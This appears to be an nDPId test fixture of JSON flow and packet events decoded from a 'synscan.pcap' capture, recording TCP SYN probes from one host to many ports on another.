-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1016,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1007,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060065,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":28201,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1016,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1007,"flow_packet_id":1,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060065,"pkt":"ACYLMQczACWzv5HuCABFAAAszxkAACsGTlmsEAAIQA2GNIzTbindU4MZAAAAAGACEAC6YgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1017,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1008,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060065,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1017,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1008,"flow_packet_id":1,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060065,"pkt":"ACYLMQczACWzv5HuCABFAAAsqCgAACgGeEqsEAAIQA2GNIzTG1rdU4MZAAAAAGACBAAZMgAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1018,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1009,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060065,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27715,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1018,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1009,"flow_packet_id":1,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060065,"pkt":"ACYLMQczACWzv5HuCABFAAAsXyMAACgGwU+sEAAIQA2GNIzTbEPdU4MZAAAAAGACBADISAAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1019,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1010,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060065,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1046,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1019,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1010,"flow_packet_id":1,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060065,"pkt":"ACYLMQczACWzv5HuCABFAAAsoekAADkGbYmsEAAIQA2GNIzTBBbdU4MZAAAAAGACCAAsdgAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1020,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1011,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060065,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1020,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1011,"flow_packet_id":1,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060065,"pkt":"ACYLMQczACWzv5HuCABFAAAsYoQAACsGuu6sEAAIQA2GNIzTAAHdU4MZAAAAAGACEAAoiwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1021,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1012,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060066,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1021,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1012,"flow_packet_id":1,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060066,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/nEAACkGIQGsEAAIQA2GNIzTJR7dU4MZAAAAAGACCAALbgAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1022,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1013,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060066,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5987,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1022,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1013,"flow_packet_id":1,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060066,"pkt":"ACYLMQczACWzv5HuCABFAAAsszoAADkGXDisEAAIQA2GNIzTF2PdU4MZAAAAAGACCAAZKQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1023,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1014,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060066,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1783,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1023,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1014,"flow_packet_id":1,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060066,"pkt":"ACYLMQczACWzv5HuCABFAAAsLiYAADEG6UysEAAIQA2GNIzSBvfdUoMYAAAAAGACCAApmAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1024,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1015,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060066,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1024,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1015,"flow_packet_id":1,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060066,"pkt":"ACYLMQczACWzv5HuCABFAAAsIwgAAC0G+GqsEAAIQA2GNIzSEV3dUoMYAAAAAGACCAAfMgAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1025,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1016,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060066,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2381,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1025,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1016,"flow_packet_id":1,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060066,"pkt":"ACYLMQczACWzv5HuCABFAAAsbtYAADYGo5ysEAAIQA2GNIzSCU3dUoMYAAAAAGACDAAjQgAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1026,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1017,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060066,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":45100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1026,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1017,"flow_packet_id":1,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060066,"pkt":"ACYLMQczACWzv5HuCABFAAAsggcAADcGj2usEAAIQA2GNIzSsCzdUoMYAAAAAGACEAB4YgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1027,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1018,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060066,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7019,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1027,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1018,"flow_packet_id":1,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060066,"pkt":"ACYLMQczACWzv5HuCABFAAAsi00AADgGhSWsEAAIQA2GNIzSG2vdUoMYAAAAAGACBAAZJAAAAgQFtA=="} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1028,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1019,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060066,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16992,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1028,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1019,"flow_packet_id":1,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060066,"pkt":"ACYLMQczACWzv5HuCABFAAAsjTgAADgGgzqsEAAIQA2GNIzSQmDdUoMYAAAAAGACBADyLgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1029,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1020,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060066,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1174,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1029,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1020,"flow_packet_id":1,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060066,"pkt":"ACYLMQczACWzv5HuCABFAAAs2LgAACgGR7qsEAAIQA2GNIzSBJbdUoMYAAAAAGACBAAv+QAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1030,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1021,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060066,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":13782,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1030,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1021,"flow_packet_id":1,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060066,"pkt":"ACYLMQczACWzv5HuCABFAAAsKigAACwG8kqsEAAIQA2GNIzSNdbdUoMYAAAAAGACBAD+uAAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1031,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1022,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060066,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5902,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1031,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1022,"flow_packet_id":1,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060066,"pkt":"ACYLMQczACWzv5HuCABFAAAskrkAADsGermsEAAIQA2GNIzSFw7dUoMYAAAAAGACEAARgQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1032,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1023,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060066,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9878,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1032,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1023,"flow_packet_id":1,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060066,"pkt":"ACYLMQczACWzv5HuCABFAAAsqEIAACUGezCsEAAIQA2GNIzSJpbdUoMYAAAAAGACCAAJ+QAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1033,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1024,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060066,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":667,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1033,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1024,"flow_packet_id":1,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060066,"pkt":"ACYLMQczACWzv5HuCABFAAAswmIAADUGURCsEAAIQA2GNIzSApvdUoMYAAAAAGACCAAt9AAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1034,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1025,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060066,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1034,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1025,"flow_packet_id":1,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060066,"pkt":"ACYLMQczACWzv5HuCABFAAAs2UYAACYGSSysEAAIQA2GNIzSI3jdUoMYAAAAAGACDAAJFwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1035,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1026,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060066,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1035,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1026,"flow_packet_id":1,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060066,"pkt":"ACYLMQczACWzv5HuCABFAAAsOl0AACcG5xWsEAAIQA2GNIzSE+7dUoMYAAAAAGACEAAUoQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1036,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1027,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060067,"flow_last_seen":1278275060067,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060067,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5877,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1036,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1027,"flow_packet_id":1,"flow_last_seen":1278275060067,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060067,"pkt":"ACYLMQczACWzv5HuCABFAAAsSLAAADAGz8KsEAAIQA2GNIzSFvXdUoMYAAAAAGACBAAdmgAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1037,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1028,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060067,"flow_last_seen":1278275060067,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060067,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1037,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1037,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1028,"flow_packet_id":1,"flow_last_seen":1278275060067,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060067,"pkt":"ACYLMQczACWzv5HuCABFAAAsSH8AADcGyPOsEAAIQA2GNIzSBA3dUoMYAAAAAGACEAAkggAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1038,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1029,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060067,"flow_last_seen":1278275060067,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060067,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5907,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1038,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1029,"flow_packet_id":1,"flow_last_seen":1278275060067,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060067,"pkt":"ACYLMQczACWzv5HuCABFAAAsWcgAADcGt6qsEAAIQA2GNIzSFxPdUoMYAAAAAGACEAARfAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1039,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1030,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060067,"flow_last_seen":1278275060067,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060067,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":211,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1039,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1030,"flow_packet_id":1,"flow_last_seen":1278275060067,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060067,"pkt":"ACYLMQczACWzv5HuCABFAAAs2jgAACwGQjqsEAAIQA2GNIzSANPdUoMYAAAAAGACBAAzvAAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1040,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1031,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060067,"flow_last_seen":1278275060067,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060067,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2035,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 